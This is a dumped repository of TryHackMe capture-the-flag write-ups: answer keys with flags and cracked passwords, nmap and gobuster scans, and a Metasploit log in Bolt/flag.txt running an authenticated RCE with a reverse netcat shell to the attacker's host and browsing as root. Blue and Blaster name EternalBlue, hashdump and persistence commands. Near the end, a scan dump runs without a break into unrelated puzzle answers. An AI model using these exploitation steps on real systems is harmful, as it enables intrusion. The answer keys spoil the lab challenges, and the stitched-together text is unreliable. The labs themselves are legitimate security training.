.
├── Advent of Cyber 2
│   └── README.md
├── Agent Sudo
│   └── README.md
├── Basic Malware RE
│   ├── Ghidra.txt
│   ├── README.md
│   ├── Zip Password.txt
│   ├── strings1.zip
│   ├── strings2.zip
│   └── strings3.zip
├── Blaster
│   ├── CVE-2019-1388.png
│   ├── README.md
│   ├── gobuster_result.txt
│   ├── masscan_result.xml
│   ├── nmap_basic.nmap
│   ├── parzival.png
│   └── retro.png
├── Blue
│   └── README.md
├── Blueprint
│   ├── README.md
│   └── exploitdb.txt
├── BoilerCTF
│   ├── README.md
│   ├── creds.txt
│   ├── gobuster.txt
│   ├── info-rot13.txt
│   ├── info.txt
│   ├── nmap_allports.nmap
│   ├── nmap_basic.nmap
│   └── robots.txt
├── Bolt
│   ├── README.md
│   ├── creds.txt
│   ├── flag.txt
│   ├── login_url.txt
│   └── nmap_basic.nmap
├── C4ptur3 Th3 Fl4g
│   ├── README.md
│   ├── secretaudio.wav
│   └── stegosteg.jpg
├── CC-Pentesting
│   ├── README.md
│   ├── Task 10 - Section 3 - Metasploit Final Walkthrough.txt
│   ├── exam
│   │   ├── gobuster.txt
│   │   ├── gobuster_secret.txt
│   │   ├── hash.txt
│   │   ├── nmap.txt
│   │   ├── secret.txt
│   │   └── ssh.txt
│   ├── gobuster_10.10.56.144
│   ├── gobuster_xxa_10.10.56.144
│   └── nmap_10.10.253.33.txt
├── CC-Steganography
│   ├── README.md
│   ├── Tools
│   │   ├── exiftool.txt
│   │   ├── sonic visualiser.txt
│   │   ├── steghide.txt
│   │   ├── stegoveritas.txt
│   │   └── zsteg.txt
│   └── spect
│       ├── KTrtNI5.png
│       ├── exam1.jpeg
│       ├── exam2.wav
│       ├── happynoot.jpeg
│       ├── jpeg1.jpeg
│       ├── jpeg2.jpeg
│       ├── jpeg3.jpeg
│       ├── png1.png
│       ├── qrcode(edited).png
│       ├── qrcode.png
│       ├── wav1.wav
│       └── wav2.wav
├── Djinn
│   └── README.md
├── Google Dorking
│   └── README.md
├── Hydra
│   ├── README.md
│   ├── flag2.txt
│   ├── ssh.png
│   ├── ssh.txt
│   ├── web.png
│   └── web.txt
├── Ignite
│   ├── CVE-2018-16763.py
│   ├── README.md
│   ├── database.php
│   ├── database.txt
│   ├── exploit-db.txt
│   └── nmap_basic.nmap
├── Inclusion
│   ├── README.md
│   ├── nmap_basic.nmap
│   ├── passwd.txt
│   ├── root.png
│   ├── root.txt
│   ├── socat.txt
│   ├── ssh.png
│   ├── ssh.txt
│   └── view-source_10.10.43.97_article_name=.._.._.._.._.._.._etc_passwd.html
├── Intro to Malware Analysis
│   └── README.md
├── Introductory Researching
│   └── README.md
├── Learn Linux
│   ├── README.md
│   ├── creds.txt
│   ├── find-shiba4.png
│   ├── find_user.png
│   ├── flag.png
│   ├── shiba2.png
│   ├── shiba3.png
│   ├── shiba4.png
│   └── test1234.png
├── Lord of the Root
│   ├── README.md
│   ├── creds.txt
│   ├── exploit.rar
│   ├── nmap_10.10.213.122.txt
│   └── nmap_allport_10.10.213.122.txt
├── Mr. Robot CTF
│   └── README.md
├── OWASP Juice Shop
│   └── README.md
├── OhSINT
│   ├── README.md
│   └── WindowsXP.jpg
├── OpenVPN
│   └── README.md
├── Overpass
│   ├── README.md
│   ├── gobuster.txt
│   ├── id_rsa
│   ├── id_rsa_hash
│   ├── nmap_basic.nmap
│   ├── root.txt
│   ├── ssh_creds.txt
│   ├── todo.txt
│   └── user.txt
├── Pentest Questionaire
│   └── README.md
├── PentestQuiz
│   └── README.md
├── Pickle Rick
│   ├── README.md
│   ├── gobuster.txt
│   ├── login.txt
│   ├── nmap_basic.nmap
│   ├── robot.txt
│   └── username.txt
├── Post-Exploitation-Basics
│   ├── README.md
│   ├── bloodhound
│   │   ├── bloodhound.txt
│   │   ├── kerberoastable-users.png
│   │   ├── loot.zip
│   │   └── service.png
│   ├── mimikatz
│   │   ├── hashcat.txt
│   │   └── mimikatz.txt
│   ├── powerview
│   │   ├── flag.txt
│   │   └── powerview.txt
│   └── server-manager
│       ├── dashbord.png
│       ├── event-logs.png
│       ├── login.png
│       ├── rdesktop.txt
│       └── sql-service-password.png
├── README.md
├── RP Metasploit
│   └── README.md
├── RP Nmap
│   ├── README.md
│   ├── nmap --script vuln 10.10.34.127.txt
│   ├── nmap -A 10.10.34.127.txt
│   ├── nmap -sS 10.10.34.127 .txt
│   └── nmap -sV -p 22 10.10.34.127.txt
├── RP PS-Empire
│   ├── PowerShell Empire.txt
│   ├── README.md
│   ├── exploit.txt
│   └── nmap_vuln.nmap
├── Retro
│   ├── CVE-2017-0213_x64.tar.xz
│   └── README.md
├── Reversing ELF
│   ├── README.md
│   ├── crackme1
│   ├── crackme2
│   ├── crackme3
│   ├── crackme4
│   ├── crackme5
│   ├── crackme6
│   ├── crackme7
│   └── crackme8
├── Shodan.io
│   └── README.md
├── Simple CTF
│   ├── CVE.txt
│   ├── README.md
│   ├── creds.txt
│   ├── exploit.py
│   ├── exploit.txt
│   ├── flag.txt
│   ├── gobuster.txt
│   ├── nmap -p 1000 10.10.99.100.txt
│   ├── nmap -p 80 -A -v 10.10.99.100.txt
│   ├── robots.txt
│   └── ssh.txt
├── Sudo Buffer Overflow
│   └── README.md
├── Sudo Security Bypass
│   └── README.md
├── The Find Command
│   └── README.md
├── TomGhost
│   ├── 48143.py
│   ├── README.md
│   ├── credential.pgp
│   ├── creds_merlin
│   ├── creds_skyfuck
│   ├── flag.txt
│   ├── hash
│   ├── nmap_10.10.18.28.txt
│   └── tryhackme.asc
├── TryHackMe.png
├── Vulnversity
│   ├── Python PTY.txt
│   ├── README.md
│   ├── gobuster.txt
│   ├── php-reverse-shell.txt
│   ├── root.txt
│   ├── shell.tar.xz
│   ├── suid.txt
│   └── user.txt
├── Welcome To TryHackMe
│   └── README.md
├── WgelCTF
│   ├── README.md
│   ├── gobuster_result.txt
│   ├── gobuster_sitemap_result.txt
│   ├── id_rsa
│   ├── id_rsa.png
│   ├── nmap_basic.nmap
│   ├── root.png
│   ├── ssh.png
│   ├── ssh2john.txt
│   └── user.png
└── Wifi Hacking 101
    ├── Captures.tar.gz
    └── README.md

--------------------------------------------------------------------------------
/Agent Sudo/README.md:
--------------------------------------------------------------------------------
# Agent Sudo | https://tryhackme.com/room/agentsudo

### [Task 2] Enumerate

#1 How many open ports? : `3`

#2 How do you redirect yourself to a secret page? : `user-agent`

#3 What is the agent name? : `chris`

### [Task 3] Hash cracking and brute-force

#1 FTP password : `crystal`

#2 Zip file password : `alien`

#3 steg password : `Area51`

#4 Who is the other agent (in full name)? : `James`

#5 SSH password : `hackerrules!`

### [Task 4] Capture the user flag

#1 What is the user flag? : `b03d975e8c92a7c04146cfa7a5a313c7`

#2 What is the incident of the photo called? : `Roswell alien autopsy`

### [Task 5] Privilege escalation

#1 CVE number for the escalation : `CVE-2019-14287`

#2 What is the root flag? : `b53a02f55b57d4439e3341834d70c062`

#3 (Bonus) Who is Agent R?
: `DesKel`

--------------------------------------------------------------------------------
/Basic Malware RE/Ghidra.txt:
--------------------------------------------------------------------------------
Ghidra : https://ghidra-sre.org/

--------------------------------------------------------------------------------
/Basic Malware RE/README.md:
--------------------------------------------------------------------------------
# Basic Malware RE | https://tryhackme.com/room/basicmalwarere

### [Task 2] Strings :: Challenge 1 (strings1)

This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag?

Note: You don't need to run the executable!

#1 What is the flag of which that MD5 gets generated? : ```FLAG{CAN-I-MAKE-IT-ANYMORE-OBVIOUS}```

### [Task 3] Strings :: Challenge 2 (strings2)

This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag?

Note: You don't need to run the executable!

#1 What is the flag of which that MD5 gets generated? : ```FLAG{STACK-STRINGS-ARE-BEST-STRINGS}```

### [Task 4] Strings 3 :: Challenge 3 (strings3)

This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag?

Note: You don't need to run the executable!

#1 What is the flag of which that MD5 gets generated? : ```FLAG{RESOURCES-ARE-POPULAR-FOR-MALWARE}```

--------------------------------------------------------------------------------
/Basic Malware RE/Zip Password.txt:
--------------------------------------------------------------------------------
MalwareTech

--------------------------------------------------------------------------------
/Basic Malware RE/strings1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Basic Malware RE/strings1.zip

--------------------------------------------------------------------------------
/Basic Malware RE/strings2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Basic Malware RE/strings2.zip

--------------------------------------------------------------------------------
/Basic Malware RE/strings3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Basic Malware RE/strings3.zip

--------------------------------------------------------------------------------
/Blaster/CVE-2019-1388.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Blaster/CVE-2019-1388.png

--------------------------------------------------------------------------------
/Blaster/README.md:
--------------------------------------------------------------------------------
# Blaster | https://tryhackme.com/room/blaster

### [Task 2] Activate Forward Scanners and Launch Proton Torpedoes

#1 How many ports are open on our target system? : `2`

#2 Looks like there's a web server running, what is the title of the page we discover when browsing to it? : `IIS Windows Server`

#3 Interesting, let's see if there's anything else on this web server by fuzzing it. What hidden directory do we discover? : `/retro`

#4 Navigate to our discovered hidden directory, what potential username do we discover? : `wade`

#5 Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover? : `parzival`

#6 Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are its contents? : `THM{HACK_PLAYER_ONE}`

### [Task 3] Breaching the Control Room

#1 When enumerating a machine, it's often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it? : `CVE-2019-1388`

#2 Looks like an executable file is necessary for exploitation of this vulnerability and the user didn't really clean up very well after testing it. What is the name of this executable? : `hhupd`

#4 Now that we've spawned a terminal, let's go ahead and run the command 'whoami'. What is the output of running this? : `nt authority\system`

#5 Now that we've confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator's desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four! : `THM{COIN_OPERATED_EXPLOITATION}`

### [Task 4] Adoption into the Collective

#2 First, let's set the target to PSH (PowerShell). Which target number is PSH? : `2`

#6 Last but certainly not least, let's look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to set up persistence which automatically starts when the system boots?
Don't include anything beyond the base command and the option for boot startup. : `run persistence -X`

--------------------------------------------------------------------------------
/Blaster/gobuster_result.txt:
--------------------------------------------------------------------------------
gobuster dir -u http://10.10.123.29/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.123.29/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/28 23:56:02 Starting gobuster
===============================================================
/retro (Status: 301)
Progress: 10600 / 87665 (12.09%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/05/29 00:00:05 Finished
===============================================================

--------------------------------------------------------------------------------
/Blaster/masscan_result.xml:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Blaster/nmap_basic.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Thu May 28 23:49:25 2020 as: nmap -sCSV -A -O -oN nmap_basic.nmap -Pn 10.10.123.29
Nmap scan report for 10.10.123.29
Host is up (0.22s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2020-05-28T18:19:57+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2020-05-21T21:44:38
|_Not valid after:  2020-11-20T21:44:38
|_ssl-date: 2020-05-28T18:20:00+00:00; +1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   219.13 ms 10.9.0.1
2   219.32 ms 10.10.123.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 28 23:50:00 2020 -- 1 IP address (1 host up) scanned in 34.93 seconds

--------------------------------------------------------------------------------
/Blaster/parzival.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Blaster/parzival.png

--------------------------------------------------------------------------------
/Blaster/retro.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Blaster/retro.png

--------------------------------------------------------------------------------
/Blue/README.md:
--------------------------------------------------------------------------------
# Blue | https://tryhackme.com/room/blue

### [Task 1] Recon

#2 How many ports are open with a port number under 1000? : ```3```

#3 What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) : ```ms17-010```

### [Task 2] Gain Access

#2 Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........) : ```exploit/windows/smb/ms17_010_eternalblue```

#3 Show options and set the one required value. What is the name of this value? (All caps for submission) : ```RHOST```

### [Task 3] Escalate

#1 If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to a meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) : ```post/multi/manager/shell_to_meterpreter```

#2 Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer) : ```SESSION```

### [Task 4] Cracking

#1 Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? : ```jon```

#2 Copy this password hash to a file and research how to crack it. What is the cracked password? : ```azlgfna22```

### [Task 5] Find flags!

#1 Flag1? (Only submit the flag contents {CONTENTS}) : ```access_the_machine```

#2 Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen. : ```sam_database_elevated_access```

#3 flag3? : ```admin_documents_can_be_valuable```

--------------------------------------------------------------------------------
/Blueprint/README.md:
--------------------------------------------------------------------------------
# Blueprint | https://tryhackme.com/room/blueprint

### [Task 1] Blueprint

Do you have what it takes to hack into this Windows Machine?

It might take around 3-4 minutes for the machine to boot.

#1 "Lab" user NTLM hash decrypted : ```30e87bf999828446a1c1209ddde4c450 = googleplus```

#2 root.txt : ```THM{aea1e3ce6fe7f89e10cea833ae009bee}```

--------------------------------------------------------------------------------
/Blueprint/exploitdb.txt:
--------------------------------------------------------------------------------
https://www.exploit-db.com/exploits/44374

--------------------------------------------------------------------------------
/BoilerCTF/README.md:
--------------------------------------------------------------------------------
# Boiler CTF | https://tryhackme.com/room/boilerctf2

### [Task 1] Questions #1

Intermediate level CTF. Just enumerate, you'll get there.

#1 File extension after anon login : `txt`

#2 What is on the highest port? : `ssh`

#3 What's running on port 10000? : `webmin`

#4 Can you exploit the service running on that port? (yay/nay answer) : `nay`

#5 What CMS can you access? : `Joomla`

#7 The interesting file name in the folder? : `log.txt`

### [Task 2] Questions #2

You can complete this with manual enumeration, but do it as you wish.

#1 Where was the other user's pass stored (no extension, just the name)? : `backup`

#2 user.txt : `You made it till here, well done.`

#3 What did you exploit to get the privileged user?
: `find`

#4 root.txt : `It wasn’t that hard, was it?`

--------------------------------------------------------------------------------
/BoilerCTF/creds.txt:
--------------------------------------------------------------------------------
basterd : superduperp@$$

stoner : superduperp@$$no1knows

--------------------------------------------------------------------------------
/BoilerCTF/gobuster.txt:
--------------------------------------------------------------------------------
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/joomla (Status: 301)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)

--------------------------------------------------------------------------------
/BoilerCTF/info-rot13.txt:
--------------------------------------------------------------------------------
Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

--------------------------------------------------------------------------------
/BoilerCTF/info.txt:
--------------------------------------------------------------------------------
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

--------------------------------------------------------------------------------
/BoilerCTF/nmap_allports.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Thu Jun 18 08:11:28 2020 as: nmap -p- -oN nmap.allports.nmap 10.10.52.211
Nmap scan report for 10.10.52.211
Host is up (0.23s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
10000/tcp open  snet-sensor-mgmt
55007/tcp open  unknown

# Nmap done at Thu Jun 18 08:30:36 2020 -- 1 IP address (1 host up) scanned in 1147.95 seconds

--------------------------------------------------------------------------------
/BoilerCTF/nmap_basic.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Thu Jun 18 07:58:49 2020 as: nmap -sS -sC -sV -A -O -Pn -oN nmap_basic.nmap 10.10.52.211
Nmap scan report for 10.10.52.211
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.18.54
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   242.68 ms 10.9.0.1
2   242.74 ms 10.10.52.211

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 18 07:59:48 2020 -- 1 IP address (1 host up) scanned in 59.93 seconds

--------------------------------------------------------------------------------
/BoilerCTF/robots.txt:
--------------------------------------------------------------------------------
User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

--------------------------------------------------------------------------------
/Bolt/README.md:
--------------------------------------------------------------------------------
# Bolt | https://tryhackme.com/room/bolt

### [Task 2] Hack your way into the machine!
#1 What port number has a web server with a CMS running? : `8000`

#2 What is the username we can find in the CMS? : `bolt`

#3 What is the password we can find for the username? : `boltadmin123`

#4 What version of the CMS is installed on the server? (Ex: Name 1.1.1) : `Bolt 3.7.1`

#5 There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID? : `48296`

#6 Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....) : `exploit/unix/webapp/bolt_authenticated_rce`

#8 Look for flag.txt inside the machine. : `THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}`

--------------------------------------------------------------------------------
/Bolt/creds.txt:
--------------------------------------------------------------------------------
bolt : boltadmin123

--------------------------------------------------------------------------------
/Bolt/flag.txt:
--------------------------------------------------------------------------------
msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS               10.10.138.124          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT                8000                   yes       The target port (TCP)
   SRVHOST              0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080                   yes       The local port to listen on.
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.18.54       yes       The listen address (an interface may be specified)
   LPORT  1337             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)


msf5 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set PASSWORD boltadmin123
PASSWORD => boltadmin123
msf5 exploit(unix/webapp/bolt_authenticated_rce) > check
[+] 10.10.138.124:8000 - The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "tkyv".

[+] Reverted user profile back to original state.
msf5 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 10.9.18.54:1337
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "pnqu".
[*] Found 4 potential token(s) for creating .php files.
[+] Deleted file pfgkpdney.php.
[+] Deleted file qrmvbrrn.php.
[+] Deleted file qpckghmyee.php.
[+] Used token fc7f7ee3bfd3001342ae73312b to create ebaeuqmekikk.php.
[*] Attempting to execute the payload via "/files/ebaeuqmekikk.php?pnqu=`payload`"
[*] Command shell session 1 opened (10.9.18.54:1337 -> 10.10.138.124:39876) at 2020-08-13 12:38:23 +0530
[!] No response, may have executed a blocking payload!
[+] Deleted file ebaeuqmekikk.php.
[+] Reverted user profile back to original state.

ls
index.html
pwd
/home/bolt/public/files
whoami
root
cd /root/
ls
ls -la
total 36
drwx------  5 root root 4096 Jul 18 19:54 .
drwxr-xr-x 27 root root 4096 Jul 18 19:30 ..
-rw-------  1 root root 2044 Jul 18 20:47 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jul 18 19:32 .composer
drwxr-xr-x  3 root root 4096 Jul 18 19:50 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jul 18 19:53 .selected_editor
drwx------  2 root root 4096 Jul 18 18:57 .ssh
cd /
find / -type f -name "flag.txt"
/home/flag.txt
cat /home/flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

--------------------------------------------------------------------------------
/Bolt/login_url.txt:
--------------------------------------------------------------------------------
http://10.10.138.124:8000/bolt/login

--------------------------------------------------------------------------------
/Bolt/nmap_basic.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Thu Aug 13 12:06:45 2020 as: nmap -sCV -T4 -oN nmap_basic.nap 10.10.138.124
Nmap scan report for 10.10.138.124
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Thu, 13 Aug 2020 06:37:04 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Thu, 13 Aug 2020 06:37:04 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 3207d3
|     Bolt | A hero is unleashed
|     href="#main-content" class="vis
|   GetRequest:
|     HTTP/1.0 200 OK
|     Date: Thu, 13 Aug 2020 06:37:02 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Thu, 13 Aug 2020 06:37:02 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: 92bfd5
|     Bolt | A hero is unleashed
|_
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : 65 | SF-Port8000-TCP:V=7.80%I=7%D=8/13%Time=5F34DF8D%P=x86_64-pc-linux-gnu%r(Ge 66 | SF:tRequest,14FD,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Thu,\x2013\x20Aug\x20 67 | SF:2020\x2006:37:02\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP 68 | SF:/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20pu 69 | SF:blic,\x20s-maxage=600\r\nDate:\x20Thu,\x2013\x20Aug\x202020\x2006:37:02 70 | SF:\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-Toke 71 | SF:n:\x2092bfd5\r\n\r\n\n\n\x20\ 72 | SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x2 75 | SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20Bolt\x20\|\x20A 76 | SF:\x20hero\x20is\x20unleashed\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2 79 | SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20 82 | SF:\x20\x20\t\n\x20\x20\x2 83 | SF:0\x20\t\ 84 | SF:n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x 85 | SF:20\x20\x20\x20\x20\x20\x20\x20\n\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\ 93 | SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2 94 | SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 96 | SF:0\x20\x20Bolt\x20\|\x20A\x20hero\x20is\x20unleashed\n\x2 97 | SF:0\x20\x20\x20\x20\x20\x20\x20\n 99 | SF:\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20 101 | SF:\x20\x20\n\x20\x20\x20\x20\t\n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x 104 | SF:20\x20\x20\x20\x20\x20\x20\x206 C:89E C@F?5 323J C:89E C@F?5 Wcf E:>6DX : `You spin me right round baby right round (47 times)` 22 | 23 | ● - . .-.. . -.-. --- -- -- ..- -. .. -.-. .- - .. --- -.. -. -.-. --- -.. .. -. --. 
: `TELECOMMUNICATIONENCODING`

● 85 110 112 97 99 107 32 116 104 105 115 32 66 67 68 : `Unpack this BCD`

● [base64-encoded challenge text omitted] : `Let's make this a bit trickier...`

### [Task 2] Hashes

A hash function is any function that can be used to map data of arbitrary size onto data of a fixed size. The values returned by a hash function are called hash values, hashcodes, digests, or simply hashes. Crack the following hashes to reveal the answers.
Hashcat bruteforce is probably the easiest way to complete this challenge, or try CyberChef and md5hashing.net if you want to go easy-mode. Reference this website for known hash types.

● 39d4a2ba07e44421c9bedd54dc4e1182 : `MDwhat?`

● e0418e7c6c2f630c71b2acabbcf8a2fb : `digest the message algorithm`

● efbd448a935421a54dda43da43a701e1 : `128-bit of delicious hash values`

● 11FE61CE0639AC2A1E815D62D7DEEC53 : `Microsoft has encryption?`

● a361f05487b879f25cc4d7d7fae3c7442e7849ed15c94010b389faafaf8763f0dd022e52364027283d55dcb10974b09e7937f901584c092da65a14d1aa8dc4d8 : `1024 bit blocks!`

